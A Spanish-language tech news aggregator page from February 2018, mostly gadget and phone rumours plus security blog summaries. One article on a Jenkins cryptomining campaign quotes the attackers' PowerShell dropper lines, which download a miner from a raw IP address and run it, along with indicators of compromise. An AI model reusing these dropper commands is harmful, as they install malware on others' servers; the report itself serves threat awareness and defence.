Sindicador de canales de noticias

Comienza el adiós al teclado Swype, que ya no recibirá actualizaciones

Red User - Hace 2 horas 35 mins

Junto con otras apps similares, Swype ofreció una interesante alternativa para tipear en dispositivos móviles, permitiendo escribir sin levantar el dedo de la pantalla. Pero lo cierto es que con el paso de los años los sistemas operativos incluyeron mejoras para sus teclados, esto sin la necesidad de incluir soluciones de terceros. Por caso, Google agregó su propia herramienta (Gboard) al teclado de Android.

En este contexto, Swype comienza a despedirse. La compañía propietaria de la app, Nuance, informó que Swype ya no recibirá actualizaciones en Android. El anuncio fue en verdad una respuesta a la consulta de un usuario, quien se contactó con la empresa por un inconveniente con la app en un teléfono Pixel.

“Lamentamos abandonar este negocio de teclados para consumidores, pero este cambio es necesario para permitirnos concentrar en desarrollar soluciones de IA para la venta a empresas”, señalaron desde Nuance, que había comprado Swype en el año 2011 por US$100 millones.

Tal como informa The Verge, a comienzos de este mes la app también había sido discontinuada en iOS.

Snapchat ahora permite agregar GIFs en fotos y videos

Red User - Hace 3 horas 12 mins

Tras el lanzamiento de un profundo resideño de su plataforma (y la polémica que el upgrade generó), Snapchat ahora permite que sus usuarios coloquen GIFs en las fotos y videos. Lo hace integrando a Giphy, una de las mayores bibliotecas de animaciones en este longevo formato de la Web. Así, se ofrecen más opciones para personalizar las Historias en esta plataforma.

Vale recordar que hace pocas semanas Instagram Stories también había agregado esta misma característica: GIFs en las Historias. Incluso integrando la misma herramienta, Giphy. A esta altura no sorprende que Snapchat e Instagram emulen novedades y características, pues esto se repite una y otra vez tal como podemos comprobar aquí y aquí. Aquellos son solamente algunos ejemplos.

Según señala Engadget, la posibilidad de incluir GIFs en Snapchat ya está habilitada en las versiones de la app para iOS y Android en las respectivas actualizaciones, aunque en algunos países puede esta novedad podría demorarse por algunas jornadas.

ImagenAndroid4All

Dominios con puṇtos debajo de las letras utilizados para Phishing

SeguInfo - Mar, 02/20/2018 - 17:15
El envío de emails con suplantación la identidad es una de las vías más comunes para realizar ataques de phishing, pero también para la creación de webs falsas, imitaciones que tratan de engañar a los usuarios para conseguir sus datos bancarios, o robar la información de inicio de sesión de la web legítima. La última técnica es utilizar caracteres latinos con un punto bajo, que es difícilmente detectable, y que permite usar un nombre de dominio casi idéntico. La suplantación de identidad sobre...

Contenido completo del post en http://blog.segu-info.com.ar o haciendo clic en el título de la noticia

Los teléfonos que Sony presentará en MWC 2018 tendrán Snapdragon 660 y Android Oreo

Red User - Mar, 02/20/2018 - 16:14

Como es usual, la previa del Congreso Mundial de Móviles nos encuentra en medio de numerosos rumores, especulaciones, filtraciones y teaser oficiales, un paquete de información que nos permite vislumbrar de antemano cuáles serán los productos que veremos en el evento que este año se celebrará desde el 26 de febrero en Barcelona.

Una de las empresas que dirá presente en el MWC 2018 es Sony, que con un teaser divulgado en Twitter no ha hecho más que volcarse por el misterio en lo que refiere a un nuevo Xperia en su catálogo móvil. En base al breve video, en el que por cierto no se ve ningún dispositivo, podemos suponer que al menos uno de los Xperia tendrá cuerpo curvado. Pero como decimos, esto no es más que una suposición.

Join us. 26.02.2018 #SonyMWC pic.twitter.com/n6IQ82XRVZ

— Sony Xperia (@sonyxperia) 19 de febrero de 2018

Eludiendo el enigma aunque no se trata de datos oficiales, un reporte del sitio The Android Soul entrega detalles sobre tres modelos Sony Xperia que serán presentados en el evento de Barcelona dentro de pocas jornadas. Se indica que estos tres nuevos smartphones serán de gama media, y que tomarán potencia del Snapdragon 660 de Qualcomm. El trío llegará de fábrica corriendo con Android 8.0 Oreo, ensanchando la cuota de la más flamante versión del S.O. móvil de Google.

En base a una prueba de rendimiento aparecida en Geekbench, se estima que los nuevos equipos en cuestión tendrán 3GB o 4GB de RAM.

La fecha de presentación oficial se realizaría el 26 de febrero, el día en el cual inicia el MWC 2018.

Xiaomi podría lanzar un potente smartphone para gaming con 8GB de RAM

Red User - Mar, 02/20/2018 - 13:42

Mientras aguardamos la presentación oficial del modelo Mi Mix 2S, una prueba de rendimiento muestra a un posible nuevo teléfono del fabricante Xiaomi el cual sería súper potente y estaría destinado al gaming. En su repaso, el sitio Phone Arena refiere a este producto como un “misterioso smartphone de Xiaomi”, considerando que no se había oído anteriormente acerca de su existencia o posible desarrollo.

El nombre clave del smartphone gamer de Xiaomi es Blackshark. En este punto vale mencionar que Black Shark es una subsidiaria de la compañía que se dedica a juegos para móviles.

Lo interesante es que en una prueba de rendimiento aparecida en AnTuTu recibe un puntaje por su desempeño que está por encima del Razer Phone, el también potente smartphone que presentó en 2017 el especialista en productos gamer (en rigor, aquel es su primer teléfono).

¿Cuáles serían las características de este smartphone de Xiaomi? Contaría con un procesador Qualcomm Snapdragon 845 y con 8GB de RAM, 32GB nativos y Android Oreo, esto según los datos en el benchmark. Su pantalla tendría una resolución de 2160 x 1080 píxeles y formato 18:9.

Al momento no hay mayores detalles respecto a este posible desarrollo, que según la mencionada fuente podría tratarse simplemente de un prototipo. No obstante, las antenas de los gamers ya están atentas a posibles novedades sobre este producto que podría llegar al mundo desde el mercado de China.

Facebook utiliza el 2FA por SMS para enviar spam

SeguInfo - Mar, 02/20/2018 - 12:36
Facebook está desangrando usuarios. Investigadores externos estiman que la red social perdió 2.8 millones de usuarios estadounidenses menores de 25 años el año pasado. Esas pérdidas han llevado a Facebook a ser más agresivo en sus esfuerzos por recuperar a los usuarios, y la compañía ha comenzado a usar avisos de seguridad para alentar a los usuarios a iniciar sesión en sus cuentas. El mes pasado Bloomberg informó que a veces, Facebook envía correos electrónicos a los usuarios advirtiéndoles...

Contenido completo del post en http://blog.segu-info.com.ar o haciendo clic en el título de la noticia

Samsung lanzará una unidad SSD de 30TB, la más grande del mercado

Red User - Mar, 02/20/2018 - 11:34

Es sabido que los movimientos de Samsung no se agotan en los emprendidos por su afamada división móvil, que en breve mostrará la serie Galaxy S9 al mundo. Para confirmar su versatilidad y diversificación de actividades, el fabricante de Corea del Sur acaba de anunciar que comienza a producir en masa la nueva PM1643, un SSD de 30.72TB, el más grande disponible en el mercado. Vale decir que no se trata de la unidad más grande del mundo, aunque sí la mayor de su especie disponible para compra en el mercado.

Se trata de una unidad de estado sólido que tiene el tamaño de un disco duro clásico, el cual combina 32 memorias NAND de 1TB que contienen 16 capas de chips V-NAND de 512GB cada una. Con este nuevo SSD, Samsung dobla la capacidad de su anterior SSD más generoso, recordando en este punto que hace dos años el fabricante asiático había lanzado un SSD de 15.36TB.

El SSD PM1643 de 30TB de Samsung cuenta con velocidades de lectura y escritura aleatoria de 400.000 y 50.000 IOPS, y de lectura y escritura secuencial de 2100mbps y 1700mbps, multiplicando por cuatro el desempeño de una unidad SSD SATA de 2,5 pulgadas.

¿Cuánto puede almacenar este gran SSD? Samsung dice que en 30TB es posible colocar unas 170 mil películas en calidad HD. Sin embargo, no se espera que este tipo de contenido sea el más usual para esta unidad, que está principalmente destinada a corporaciones. Su precio aún no fue anunciado, aunque se espera que semejante ventaja tenga su correlato en la cifra impresa en la etiqueta del producto.

Fuente: Samsung

Spotify estaría trabajando en su propio altavoz inteligente

Red User - Mar, 02/20/2018 - 11:20

Amazon zanjó el camino con la línea de altavoces inteligentes Echo, Google siguió la huella con sus parlantes Home, Apple tiene sus HomePod; y desde entonces se menciona el nombre de muchas otras compañías de peso interesadas en participar de este categoría que promete réditos, incluso vendiendo a pérdida, tal como se explica en esta nota. Se ha dicho que Facebook trabaja en su propio altavoz, lo mismo que Samsung, y ahora hay un nuevo actor en danza: Spotify.

Un reporte publicado en The Guardian señala que Spotify estaría trabajando en su propio parlante inteligente. Si se confirmase este rumor, la compañía detrás del célebre streaming musical debutaría en el negocio del hardware. En todo caso, se trata de un paso que han emprendido otros desarrolladores de softwares y/o servicios, con mayor o menor éxito. Un caso análogo más o menos reciente es el de Snapchat, cuando lanzó su primer producto hard: las gafas Spectacles.

Lo cierto es que los parlantes inteligentes son una suerte de boom en el mercado, una de las nuevas joyas del sector tecnológico, algo que fue evidente en la reciente edición de la feria CES que se celebró en enero en Las Vegas. Aunque para ser justos hay que decir, en verdad, que los altavoces son una especie de excusa de los fabricantes para extender la pisada de sus propios asistentes virtuales, integrados a estos productos. Google con su Assistant, Amazon con Alexa, Apple con Siri.

Volviendo al caso de Spotify, The Guardian señala que la especulación respecto al desarrollo de un altavoz se desprende de una serie de ofertas de trabajo publicadas por la compañía, en las cuales se pide personal para un departamento de hardware. Incluso se habla de que “están en camino de crear sus primeros productos físicos”. En todo caso, no será extraño que el primer producto de hard de esta empresa sea un parlante.

Vale recordar en este punto que los recientemente lanzados HomePod de Apple no admiten acceso a Spotify, esto naturalmente para favorecer su propio streaming de música, Apple Music. ¿Será el parlante inteligente de Spotify una respuesta a ello?

Imagen: What Hi-Fi (YouTube)

Por Uriel Bederman

El Galaxy S9 Plus tendrá cámara doble, según imagen filtrada

Red User - Mar, 02/20/2018 - 10:52

A menos de una semana de la presentación oficial de la serie Galaxy S9 (el evento está fijado para el 25 de febrero, antes de la apertura del MWC 2018 de Barcelona) se intensifican los movimientos y precisiones en la danza de rumores en torno a los nuevos teléfonos insignia de Samsung.

El más fresco leak, una vez más cortesía de Evan Blass (@EvLeaks), revela detalles muy confiables respecto al apartado fotográfico del Galaxy S9 Plus, la variante más extensa que se espera llegue con una pantalla de 6.2 pulgadas, en relación a la de 5.8 del S9 regular. Además del detalla de las cámaras traseras, Blass divulga imágenes que nos muestran el aspecto general del dispositivo.

De acuerdo al siguiente tuit del famoso filtrador, el Samsung Galaxy S9 Plus tendrá una cámara doble trasera, tal como vemos en las imágenes, la cual será de 12MP + 12MP. Siguiendo a Engadget y en línea con anteriores rumores que circularon, el Galaxy S9 regular no tendrá cámara doble. En tanto, esta característica (que se convirtió en un estándar de la alta gama móvil durante 2017) será una ventaja del S9 Plus respecto a su compañero de serie.

Según las fuentes, las cámaras de los S9 (la principal en ambos modelos) tendrán la capacidad de escoger entre apertura de f/1.5 y f/2.4, lo cual supone amplios beneficios para las capturas. Por lo demás se indica que la cámara frontal será de 8MP y que podrá grabar en súper cámara lenta (960fps).

In case you need large, unmarked versions… pic.twitter.com/d233KC1cI8

— Evan Blass (@evleaks) 19 de febrero de 2018

En todo caso, no sorprenden estas bondades repasadas siendo que en los diversos teasers que divulgó el fabricante se hizo énfasis en el apartado de fotografía de los nuevos smartphones.

Los Galaxy S9 llegarán con procesadores Qualcomm Snapdragon 845 o bien con Exynos 9810, dependiendo del mercado. Se ha dicho que serán más costosos que la serie S8, esto en el marco de un dato que acaba de divulgar IDC: que Apple y Samsung casi empataron en ventas durante el Q4 2017, y que no obstante los dueños de iPhone facturaron muchísimo más dinero que su rival en el negocio móvil.

Fuentes: Engadget, SamMobile

Por Uriel Bederman

APT Simulator: simula un equipo víctima de una APT

SeguInfo - Mar, 02/20/2018 - 08:17
APT Simulator de Nextron Systems GmbH es un simple script en Batch para Windows que utiliza un conjunto de herramientas y archivos de salida para que el sistema parezca comprometido. Sus casos de uso son: POC: agentes de detección de endpoint / herramientas de evaluación de compromiso Poner a prueba las capacidades de detección y monitorización de la seguridad Poner a prueba la respuesta de un SOC ante una amenaza que no sea un simple EICAR o un escaneo de puertos Preparar un entorno para dar...

Contenido completo del post en http://blog.segu-info.com.ar o haciendo clic en el título de la noticia

Más de 2,7 millones de euros en criptomonedas desde instalaciones de Jenkins comprometidas

UAD - Mar, 02/20/2018 - 08:02
El equipo de CheckPoint ha descubierto la que puede ser la mayor operación de minado de criptomonedas: el equivalente a más de 3 millones de dólares de la criptomoneda Monero (XMR) han sido generados utilizando la capacidad de procesado de miles de servidores Jenkins mal configurados.


Jenkins es un popular software de integración continua (CI) de código abierto escrito en Java. Actualmente es mantenido por la comunidad y por el proveedor de servicios de CD/CI CloudBees.

El grupo criminal, de origen chino, se ha valido de instalaciones mal configuradas o inseguras para instalar el troyano encargado de minar la criptomoneda.

Para inyectar el código malicioso, los atacantes aprovechan la vulnerabilidad etiquetada con CVE-2017-1000353 que permitirá saltar restricciones de seguridad y ejecutar comandos en la interfaz CLI de Jenkins:

  1. Primero se comprueban las capacidades y permisos del cliente víctima.
  2. En función de la respuesta anterior, se inyecta el payload que contiene entre otras cosas el código encargado del minado de la criptomoneda.

Inyección del código malicioso. Fuente: https://research.checkpoint.com
Esta segunda fase del ataque es la más interesante:

  1. Primero se ejecuta una instancia de PowerShell en segundo plano: powershell.exe -WindowStyle Hidden: 
  2. Se declara un objeto de tipo web-client: $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT
  3. El dropper descarga el software encargado del minado: $P.DownloadFile(‘http://222.184.79.11:5329/minerxmr.exe’, ‘C:\\Windows\\minerxmr.exe’)
  4. Para posteriormente ejecutarlo con el comando: START C:\\Windows\\minerxmr.exe


Los atacantes están bien organizados y distribuyen las operaciones de minado entre diferentes 'pools'. Sin embargo, todas las ganancias están centralizadas en una única cartera, que al momento de escribir la noticia, supera ya los 10829 XMR. El equivalente a unos 2,75 millones de euros al cambio.


Algunos IOCs:

Dominios e IP:

  • 222[.]184[.]79[.]11
  • 183[.]136[.]202[.]244
  • btc[.]poolbt[.]com
  • shell[.]poolbt[.]com
  • xmr[.]btgirl[.]com[.]cn
  • btc[.]btgirl[.]com[.]cn


Muestras:

SHA256: 0bb4503cc52530ddadb102fa4010fb4d89af88aca846d4b16f601d0702134246 

SHA256: 06f8eda46fd6bdc11b8ec4d18a0f0afbf3d47f82cea8363d342975896582a715

SHA256: f0430130a2f3549b1aeff0a9fb2246f68f585a7c1d312c7be385a1cf5f37e70d

SHA256: c87d294cb0384cb56f4829d58cdd3f53572d3f95c2133a9b1da5f5bc1710f22f

SHA256: f750d6da918a5f2f2c442a339821ffebcad4b61e4ca1684bac0e7df98416a794

SHA256: 3002551eebaf486d77a2b81d87db553ad8632bb132553e306395c5da589171fe

SHA256: 213a23219ff89c412f92aa1fdf7152178a81514014ee1cc4ffee97e725ee63a3

SHA256: ff8c97cd55523cbdceef80407269d35bbf78abcbf807426c12d9debe1ce498d9

SHA256: 2beaa23907c40cfcb705844f4f515ff81a788abe1aed2c8d23626d9d735968ae

SHA256: b22fa98c3ee99222c4e827a9745f206ccf7cd40530459a92f183e148b0df5ce9


Francisco Salido
[email protected]
Más información:
Jenkins Miner: One of the Biggest Mining Operations Ever Discovered
https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/





Volkswagen anticipa el I.D. Vizzion, un prototipo eléctrico que no tiene volante

Red User - Lun, 02/19/2018 - 15:12

Los prototipos, usuales en la industria automotriz y poco frecuentes en la tecnológica (al menos públicamente), nos permiten espiar cómo será la movilidad del futuro, anticiparnos a los modelos que circulan en las calles del mundo. Ahora es Volkswagen quien nos muestra un interesante vehículo conceptual, que llaman I.D. Vizzion, el cual será presentado al mundo en el Geneva International Motor Show 2018 que abrirá sus puertas el próximo 8 de marzo.

En línea con las tendencias que no sólo son el futuro, sino que también podemos mencionar como ya presentes en la industria, el I.D. Vizzion Concept es un automóvil 100% eléctrico y además es autónomo; en rigor, no cuenta con un volante, tal como podemos ver en la siguiente imagen bocetada de su interior.

Boceto que muestra el interior de este prototipo, siendo notable la ausencia del clásico volante.

Se trata de un coche con fisonomía de sedán con diseño deportivo con poco más de 5 metros de longitud, con un interior sin dudas futurista. Allí dentro se destaca la presencia de un asistente virtual que comprenderá comandos verbales y gestuales de los pasajeros, pudiendo reconocer y cumplir las órdenes de los diversos ocupantes del habitáculo.

En cuanto a mecánica, este vehículo del fabricante alemán es de tracción total dispone de dos motores eléctricos que entregan una potencia total de 306 caballos de fuerza. Gracias a esta planta mecánica, es capaz de alcanzar una velocidad máxima de 180 kilómetros por hora, con una autonomía superior a los 660 kilómetros.

Como mencionamos, este vehículo verá la luz en carácter de prototipo en las próximas semanas en el Salón de Ginebra, y se espera que se convierta en una realidad hacia fines del año 2019. Sin dudas, esta es una de las tantas respuestas que Volkswagen procura entregar al mercado tras el gran escándalo que lo tuvo como protagonista hace un tiempo, en lo que se conoció como el “dieselgate”, cuando el fabricante falsificó datos relativos a las emisiones de muchos de sus vehículos. En rigor, la empresa dijo que hacia el año 2025 planea lanzar más de 20 modelos eléctricos, aunque el I.D. Vizzion apostará más fuerte aún basándose además en las promesas de la conducción autónoma.

FuenteThe Verge

Xiaomi Mi Mix 2S al descubierto en imagen filtrada con 90% de pantalla

Red User - Lun, 02/19/2018 - 14:27

En RedUSERS ya hemos mencionado anteriormente que Xiaomi presentará en el Congreso Mundial de Móviles 2018 su modelo Mi Mix 2S. Se espera que éste, el siguiente en la línea iniciada por los lujosos Mi Mix y Mi Mix 2, extienda las señas clásicas de la serie: pantalla de lado a lado y specs propias de un insignia.

Ahora, a poco del inicio del MWC 2018 (abre sus puertas el 26 de febrero en Barcelona) circula una imagen que muestra el supuesto aspecto del frontal del Xiaomi Mi Mix 2S. De acuerdo a Android Headlines, allí podemos ver un teléfono con una relación cuerpo-pantalla en torno al 90 por ciento. También se advierte lo que sería un sistema de parlantes doble y la presencia de un puerto USB Type-C. Al parecer, prescindiría del jack de audio de 3.5 milímetros.

Como señalamos, el Mi Mix 2S será un verdadero representante de la alta gama. Rumores señalan que se potenciaría con Snapdragon 845 de Qualcomm y con 8GB de RAM. La pantalla del teléfono, con ratio de 18:9, sería de 5.99 pulgadas con resolución de 2160 x 1080 píxeles. En este caso, el fabricante optaría por una cámara doble en la cara posterior, y una cámara frontal que, según un leak previo, se encontraría en un pequeño espacio lateral-superior, siempre con el ánimo de ser fieles a la filosofía pura-pantalla. El teléfono llegaría al mercado corriendo con Android 8.0 Oreo.

Otro dato interesante que se ha oído en la danza de rumores: el Mi Mix 2 de Xiaomi contaría con un lector de huellas embebido en pantalla. Mientras tanto, no queda más que estar atentos a los rumores y leaks que aparezcan de aquí hasta el día de la presentación oficial, cuando se despejarán todas las dudas respecto a este nuevo equipo insignia del pujante fabricante chino.

Hace solamente algunas jornadas Xiaomi presentó nuevas phablets de gama media, los modelos Redmi Note 5 y Redmi Note 5 Pro.

Por Uriel Bederman

Así sería la Galaxy Tab S4, que Samsung presentaría en el MWC 2018

Red User - Lun, 02/19/2018 - 14:05

Junto con la serie Galaxy S9 que Samsung mostrará al mundo en el Congreso Mundial de Móviles 2018, se espera que el fabricante surcoreano presente otros productos en el evento de Barcelona. ¿Anunciará sus propias gafas inteligentes, tal como se dijo hace algunas jornadas en base al registro de un sugerente logotipo? En las vísperas, mientras esperamos confirmaciones y desmentidas, circulan en la Web las posibles especificaciones de la tablet Galaxy Tab S4, que sería presentada en el MWC 2018.

Los datos surgen de una prueba de rendimiento dentro de la base de GFXBench, bajo el nombre de modelo SM-T835. Como es usual en esta serie, se esperan specs propias de una tablet de alta gama. Por ejemplo, me menciona la presencia de un procesador Qualcomm Snapdragon 835, 4GB de RAM y 64GB nativos.

La tablet que sucederá al modelo Tab S3 tendría una pantalla de 10.5 pulgadas con resolución de 2560 x 1600 píxeles. En la cara posterior habría una cámara de 12MP, mientras que la cámara frontal sería de 8MP. Siguiendo a Phone Arena, en el apartado de conectividad estaría ausente el NFC. Buena noticia, llegaría corriendo con Android 8.0 Oreo.

Estaremos atentos a las jornadas del MWC 2018 para confirmar o corregir los datos que se desprenden del mencionado reporte.

Imagen: CNET / Galaxy Tab S3

Por Uriel Bederman

BlackBerry: Filtran posibles specs de Uni, Athena y Luna, nuevos teléfonos de la marca

Red User - Lun, 02/19/2018 - 13:51

A pocas jornadas del arranque del mayor evento anual para la industria móvil, se filtran en la Web los nombres clave y posibles características de tres nuevos teléfonos de BlackBerry. Uno de ellos, mencionado como Athena, sería presentado justamente en el MWC 2018, que iniciará el 26 de febrero en Barcelona, y lanzado al mercado hacia abril.

Athena llegaría al mercado con un teclado QWERTY físico y tendría specs de un gama media-alta. Según el reporte, este smartphone se potenciaría con un procesador Qualcomm Snapdragon 660 y con 6GB de RAM, y agregaría 64GB nativos expandibles vía microSD. Además incluiría una característica que ha sido estándar de la gama alta durante 2017 y que se afianzará este año en más categorías: la cámara doble.

El segundo equipo BlackBerry filtrado es mencionado como Uni. En este caso no hay un consenso respecto a sus posibles especificaciones y señas particulares, siendo que el fabricante emplea este nombre en otros productos: en una cámara que fue patentada, y en un dispositivo VR comercializado con la marca Alcatel, Uni360.

En último término aparece el mencionado como Luna, que recién sería presentado en IFA 2018, recordando que el evento de tecnología que se celebra en Berlín se realiza cada año hacia agosto o septiembre.

Como ya es usual en los teléfonos BlackBerry de un tiempo a esta parte, y ya bajo el ala de TCL, se espera que estos tres equipos lleguen corriendo con Android. Por lo demás, este año BlackBerry presentaría una nueva versión del modelo KeyONE, tal como contamos oportunamente en esta nota de RedUSERS.

Fuente: CrackBerry

Imagen: Android Headlines / BlackBerry KeyONE

Mejores prácticas de seguridad en AWS

SeguInfo - Lun, 02/19/2018 - 12:39
El documento técnico "AWS Security Best Practices" [PDF] está destinado a clientes (existentes o potenciales) que están diseñando su infraestructura de seguridad y configuración para las aplicaciones que se ejecutan en Amazon Web Services (AWS). Si bien es un documento publicado en 2016, proporciona una guía completa de las las mejores prácticas de seguridad que ayudan a definir un Sistema de Gestión de Seguridad de la Información (SGSI) y construir un conjunto de políticas y procesos de...

Contenido completo del post en http://blog.segu-info.com.ar o haciendo clic en el título de la noticia

El sucesor del LG G6 se atrasa: será presentado en junio

Red User - Lun, 02/19/2018 - 11:16

LG presentará en junio un nuevo teléfono insignia, cuyo nombre en código es Judy. La compañía ya había adelantado que se apartaría de su predecible ciclo de lanzamiento de teléfonos inteligentes, por lo que, luego de varios años, se saltará el MWC de Barcelona.

Tradicionalmente, LG muestra las novedades de la serie G en la primera mitad del año, mientras que la serie V llega siempre en la segunda mitad. El gama alta que planea lanzar a mitad de 2018 contaría, según el celebre filtrador Evan Blass, con un chip Qualcomm Snapdragon 845, 65GB de almacenamiento interno, 4GB de RAM, parlantes estéreo “boombox”, carga inalámbrica y construcción resistente al agua y el polvo.

La pantalla, por su parte, será de 6.1 pulgadas con una configuración Full Vision de 18:9, lo que lo haría ligeramente más grande que el G6, que tiene un display de 5.7 pulgadas. Vale destacar que, según Blass, el equipo no será llamado G7, sino que LG apostará por otro nombre.

Otro aspecto interesante es que el panel será MLCD+, que puede alcanzar un brillo máximo de 800 nits mientras usa un 35 por ciento menos de energía que los paneles IPS estándar. A modo de referencia, el iPhone X posee una pantalla de 625 nits.

“Judy” también contará con cámaras duales con sensores de 16 megapíxeles. El sistema de cámara del teléfono también tendrá capacidades de inteligencia artificial, según Blass. LG dijo a principios de este mes que mostraría su primer conjunto de tecnologías de inteligencia artificial en una versión mejorada de su insignia V30, según los informes, llamado V30s.

Vía: TheVerge

KDE Plasma puede ser infectado insertando unidad USB

SeguInfo - Lun, 02/19/2018 - 08:00
El procedimiento, detectado por el experto Graham Cluley, recuerda el modus operandi del gusano Stuxnet. Stuxnet concitó gran atención del sector de seguridad informática en 2010, al constatarse que había sido utilizado por servicios de inteligencia israelíes y estadounidenses, para sabotear procesos industriales de producción de uranio enriquecido en Irán. Stuxnet explotaba una vulnerabilidad de día cero en Windows, que hacía posible infectar un PC incluso cuando el usuario había antes...

Contenido completo del post en http://blog.segu-info.com.ar o haciendo clic en el título de la noticia

Corregidas múltiples vulnerabilidades en RubyGems

UAD - Lun, 02/19/2018 - 05:30
Rubygems, el popular gestor de paquetes para Ruby, se ha actualizado urgentemente para dar solución a un paquete de vulnerabilidades que le afectaban.
RubyGems es un gestor de paquetes para el lenguaje de programación Ruby que proporciona un formato estándar y autocontenido (llamado gem) para poder distribuir programas o bibliotecas en Ruby, una herramienta destinada a gestionar la instalación de éstos, y un servidor para su distribución.
Aunque no se ha facilitado mayor información, las vulnerabilidades corregidas han sido las siguientes:
  • Salto de restricciones (Path traversal) a la hora de escribir a un enlace simbólico de directorio.
  • Salto de restricciones (Path traversal) durante la instalación de gemas.
  • Vulnerabilidad de deserialización de objetos asociada al dueño de una gema.
  • Incorrecta gestión de los campos octales en las cabeceras de ficheros tar.
  • Incorrecta gestión de ficheros duplicados en un paquete.
  • Incorrecta validación de las URLs en el atributo spec homepage que podría facilitar ataques XSS.

Las vulnerabilidades fueron descubiertas por nmalkin, plover, Yasin Soliman y se ha publicado la versión 2.7.6 para corregirlas. Se puede actualizar a esta versión desde el propio gestor de rubygems mediante:
gem update --system

Más información:
RubyGems 2.7.6 includes security fixes:http://blog.rubygems.org/2018/02/15/2.7.6-released.html

Rubygems, no todas las gemas son piedras preciosas
http://unaaldia.hispasec.com/2015/06/rubygems-no-todas-las-gemas-son-piedras.html

Facebook: Falla en la autenticación de dos pasos genera spam, reportan usuarios

Red User - Dom, 02/18/2018 - 14:13

Un informe del sitio TechCrunch da cuenta de reportes que indican que el sistema de autenticación en dos pasos de Facebook genera spam, el cual llega a los teléfonos de los usuarios. Desde Facebook explican que se trata de una falla y que ya se encuentran trabajando en remediar esta situación.

Según los responsables de seguridad de la red social, un bug en este sistema generó envíos sin intención (SMS) al teléfono de usuarios que emplean este doble factor de autenticación que, vale recordar, es opcional. “No fue nuestra intención enviar estas notificaciones y pedimos disculpas por cualquier inconveniente que estos mensajes puedan haber causado”, explican en un comunicado.

Al igual que ocurre en otras plataformas y servicios, la autenticación de dos pasos consiste en el envío de un código al teléfono del usuario luego del ingreso de la usual contraseña; una vez que se inserta este código recibido se puede acceder. Esto supone que si por caso alguien roba o accede a un pass, éste no será suficiente para el acceso pues será necesario tener a mano el teléfono asociado a la cuenta e ingresar el código que allí se envía.

En esta ocasión, los usuarios no sólo recibían este código útil en términos de seguridad, sino que también recibían en sus teléfonos otro tipo de contenidos; esto de acuerdo a la denuncia de Gabriel Lewis, un ingeniero de software que alertó sobre este hecho. La falla se presentó, al menos, entre los usuarios residentes en Estados Unidos. Se espera la solución en los próximos días.

“Estamos trabajando para garantizar que las personas que se registren para la autenticación a dos pasos no reciban notificaciones no relacionadas con la seguridad, a menos que elijan específicamente recibirlas, y lo mismo ocurrirá con aquellos que se inscribieron en el pasado. Esperamos tener las soluciones implementadas en los próximos días. Para reiterar, esta no fue una decisión intencional; fue un error”, concluyen desde Facebook.

Imagen: AP Photo/Gus Ruelas

Páginas

Suscribirse a DIP Solutions sindicador